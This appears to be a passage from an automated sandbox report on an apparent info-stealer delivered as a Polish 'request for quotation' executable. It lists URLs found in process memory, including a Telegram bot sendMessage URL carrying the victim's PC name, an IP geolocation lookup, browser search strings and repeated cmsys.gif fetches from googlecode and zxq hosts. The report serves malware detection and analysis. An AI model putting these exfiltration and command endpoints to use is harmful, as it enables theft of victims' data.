                    Source: explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd01.zxq.netst.exe
                    Source: explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif
                    Source: explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif)a
                    Source: explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif3
                    Source: explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif7a
                    Source: explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif:a
                    Source: explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gifM
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gifg
                    Source: explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gifj
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gifp
                    Source: explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gif
                    Source: explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gif&
                    Source: explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gif)a
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gif7a
                    Source: explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gif:a
                    Source: explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gifg
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gifj
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: RegSvcs.exe, 0000000A.00000002.4486046867.0000000002E35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002E35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: RegSvcs.exe, 0000000A.00000002.4486046867.0000000002E35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: RegSvcs.exe, 0000000A.00000002.4486046867.0000000002E35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20a
                    Source: explorer.exe, 00000004.00000003.2658748665.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2177725240.0000000000725000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://api.w.org/
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: RegSvcs.exe, 0000000A.00000002.4486046867.0000000002F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: RegSvcs.exe, 0000000A.00000002.4486046867.0000000002F0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBjq
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://fonts.googleapis.com/css?family=DM
                    Source: explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://news.google.com/publications/CAAqBwgKMJSRswswoazKAw?hl=en-US&gl=US&ceid=US%3Aen
                    Source: RegSvcs.exe, 0000000A.00000002.4486046867.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002E35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegSvcs.exe, 0000000A.00000002.4486046867.0000000002E35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.72
                    Source: RegSvcs.exe, 0000000A.00000002.4486046867.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002E35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.72$
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325346008.0000000003B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://schema.org
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: RegSvcs.exe, 0000000A.00000002.4489526374.0000000003D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: RegSvcs.exe, 0000000A.00000002.4486046867.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002F33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: RegSvcs.exe, 0000000A.00000002.4486046867.0000000002F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBjq
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325346008.0000000003B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/#logo
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/#organization
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/#website
                    Source: explorer.exe, 00000004.00000003.2658748665.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/?p=187
                    Source: explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/?s=
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/about-us/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/choosing-the-right-commercial-cleaning-company-for-your-business-needs/
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmd01.zxq.net/cmsys.giftXf
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmsys.gif
                    Source: explorer.exe, 00000004.00000003.2556013660.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmsys.gifB
                    Source: explorer.exe, 00000004.00000003.2556013660.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmsys.gife
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmsys.gife(Y
                    Source: explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmsys.gife0
                    Source: explorer.exe, 00000004.00000003.2556013660.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmsys.gifeJ
                    Source: explorer.exe, 00000004.00000003.2556013660.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmsys.gifeZ
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmsys.gifem
                    Source: explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmsys.gifen
                    Source: explorer.exe, 00000004.00000003.2556013660.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmsys.gifet
                    Source: explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmsys.gifn
                    Source: explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmsys.gifnhYZ
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmsys.gifnxYJ
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmsys.gifom
                    Source: explorer.exe, 00000004.00000003.2556013660.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/cmsys.gifz
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/contact-us/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/customizable-online-games-a-personalized-gaming-experience/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/diy-home-repair-projects-for-busy-singaporeans/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/essential-factors-to-consider-for-effective-water-extraction-services/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/exploring-the-world-of-green-herb-the-ultimate-showdown-of-flavours-and-quality/
                    Source: explorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325346008.0000000003B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/feed/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/how-to-handle-quick-home-repairs-without-professional-help-in-singapore/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/news/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/news/business/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/news/entertainment/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/news/science-health/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/news/technology/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/privacy-policy/
                    Source: explorer.exe, 00000004.00000003.2448655083.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2556013660.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325385308.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658748665.00000000006F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/snoring-and-sleep-apne
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/snoring-and-sleep-apnea/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/transform-your-space-simple-home-repairs-for-singaporeans/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/
                    Source: cmsys.cmn.4.drString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/#breadcrumb
                    Source: explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/#webpage
                    Source: explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/-
